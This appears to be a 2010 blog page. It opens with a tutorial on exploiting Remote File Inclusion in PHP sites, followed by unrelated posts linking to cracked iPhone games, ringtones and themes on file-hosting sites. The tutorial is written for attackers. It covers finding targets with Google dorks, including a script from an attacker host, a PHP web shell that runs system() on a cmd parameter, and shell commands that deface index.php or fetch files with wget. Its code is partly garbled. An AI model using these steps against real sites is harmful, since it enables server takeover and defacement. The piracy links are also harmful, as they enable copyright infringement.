Wednesday, July 28, 2010

A simple tutorial on Remote File Inclusion (RFI)

RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.




RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..



Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website



http://victimsite.com/index.php?page=home



As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.



http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt



I have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -



•Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.

•Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.

•Case 3 – successfull execution :)

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go










echo "";


echo "Run command: ".htmlspecialchars($_GET['cmd']);






system($_GET['cmd']);






?>



The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.



http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript






http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript



What it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..



cmd=echo U r pwn3d by xero> index.php



It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..



I leave the rest on your creativity..





BlacK ThemeS AnimateD S40
















BlacK ThemeS AnimateD S40

52 Theme | NtH | 44.5 MB


Download
http://hotfile.com/dl/57232573/4166675/BlacK.ThemeS.AnimateD.rar.html


http://sharingmatrix.com/file/14412287/BlacK.ThemeS.AnimateD.rar

World ringtones


Format: mp3 | 128 Kbps | Quantity: 26 | Size: 9.9 mb | Hf
World ringtones


List:

Airtel_In_Marathi.mp3
Beautiful_Flute.mp3
Chinese_Instrumental.mp3
Fifa_2010_Opening.mp3
Great_Flute.mp3
Guitar_Gitar.mp3
Guitar_In_2009.mp3
Irish_Traditional.mp3
Karate_Kid2010.mp3
Mobilink_Black_Berry.mp3
Mundial.mp3
Music_Of_Love.mp3
Mystic_Flute.mp3
Na_Na_Na_Remix.mp3
Nokia_Arabian_Rmx.mp3
Nokia_Chinese.mp3
Oh_Africa.mp3
Pazza_Inter.mp3
Samsung_Cool.mp3
Satellite.mp3
Saxophone_Amazing.mp3
Spanish_Giutar.mp3
Vodafone_Latest.mp3
Vuvuzela_Horn.mp3
Waka_2010.mp3
Whistle_Romance.mp3

Download:
http://hotfile.com/dl/52470325/0cef09d/World_ringtones.rar.html

Worms v2.0.2 iPhone iPod Touch Cracked-COREPDA


Worms™ for iPhone and iPod touch is an authentic console-style edition of the award-winning series that features the classic weapons plus the infamous Holy Hand Grenade, Concrete Donkey and Ninja Rope and takes advantage of the innovative Multi-Touch user interface for this edition. Bringing a zany mix of iconic, crazy weapons and exhilarating action-strategy, this title will entertain for hours! With 50 challenges and quick play modes for the single player and 4-player hot-seat multiplayer support with random level creation, Worms™ provides almost endless entertainment.


Features:

* Innovative Multi-Touch user interface, including pinch to zoom and two-finger scroll.
* iPod music support – play your own music library in game, or enjoy the default Worms music.
* Save game status on quit. This all-new feature automatically saves to the last turn if you exit the application and is great for longer battles.
* Now play against your friends with up to 4-player Bluetooth multiplayer mayhem!
* Face the mighty challenge of the all-new Body Count mode.
* Post your high scores and achievements to Twitter or Facebook from in-game.
* The return of action-replays, and improved visuals for 3GS users.
* Plus+ integration – create your own friends lists and write your name in the Worms™ hall of fame on a selection of online leader-boards and more…

Release name: Worms.v2.0.2.iPhone.iPod.Touch.Cracked-COREPDA
Size: 89.30 mb


DOWNLOAD !!:
http://uploading.com/files/1846bbb1/W.v2.0.2..rar

Clickgamer Technologies Ltd Angry Birds v1.4.0 iPhone iPod Touch-Lz0PDA


Clickgamer Technologies Ltd Angry Birds v1.4.0 iPhone iPod Touch-Lz0PDA



The survival of the Angry Birds is at stake. Dish out revenge on the green pigs who stole the Birds’ eggs. Use the unique destructive powers of the Angry Birds to lay waste to the pigs’ fortified castles. Angry Birds features hours of gameplay, challenging physics-based castle demolition, and lots of replay value. Each of the 165 levels requires logic, skill, and brute force to crush the enemy. Features 165 levels, leaderboards, achievements, Facebook and Twitter integration, and lots and lots of Angry Birds! Read more @ iTunes.

Release Name: Clickgamer.Technologies.Ltd.Angry.Birds.v1.4.0.iPhone.iPod.Touch-Lz0PDA
Size: 14.29MB


DOWNLOAD !!:
http://uploading.com/files/ad98bc5a/Clickgamer.Technologies.Ltd.Angry.Birds.v1.4.0.iPhone.iPod.Touch-Lz0PDA.rar

Secret Mobile Codes (Full code 2010)


Secret Mobile Codes By Soft2050-Krazzy7 | 5MB

Contains Secret Codes Of Many Mobiles Like Nokia,LG,Motorola,Sony,Siemens. Etc.


Download:
FileServe
http://www.fileserve.com/file/HrJGz6E

Street Fighter IV v1.00.02 iPhone iPod Touch-COREPDA


Street Fighter IV v1.00.02 iPhone iPod Touch-COREPDA | 232 MB


Street Fighter 4 delivers the first true fighting game on iPhone. This uncompromising fighter features all the visceral thrills, fantastic graphics and brilliant gameplay that are hallmarks of the series. Long time Street Fighter fans can jump into the action and have an instant familiarity with the controls. For more casual players Street Fighter 4 features numerous settings and tutorials that put you on the path to world warrior. Multiplayer mode included over Bluetooth!

Features:
•Fight as ten Street Fighter characters in seven different environments.
•Full move sets including Unique Attacks, Special Moves, Focus Attacks, Super Combos and Ultra Combos.
•For a true arcade experience, battle head-to-head on Bluetooth against friends and foes alike.
•Robust “Dojo” boot camp transforms neophytes into Street Fighter masters in five in-depth lessons.
•Customize the controls for your style of play. Move the buttons anywhere you want on the screen and set the level of transparency.
•Unleash super moves with a tap of the “SP” button, or toggle it off from the “Options” menu if you want to enter the button combo manually.
•Four levels of difficulty.

Download
http://hotfile.com/dl/56944680/f3c1616/StreetF4iPhone.rar.html

http://sharingmatrix.com/file/14213809/StreetF4iPhone.rar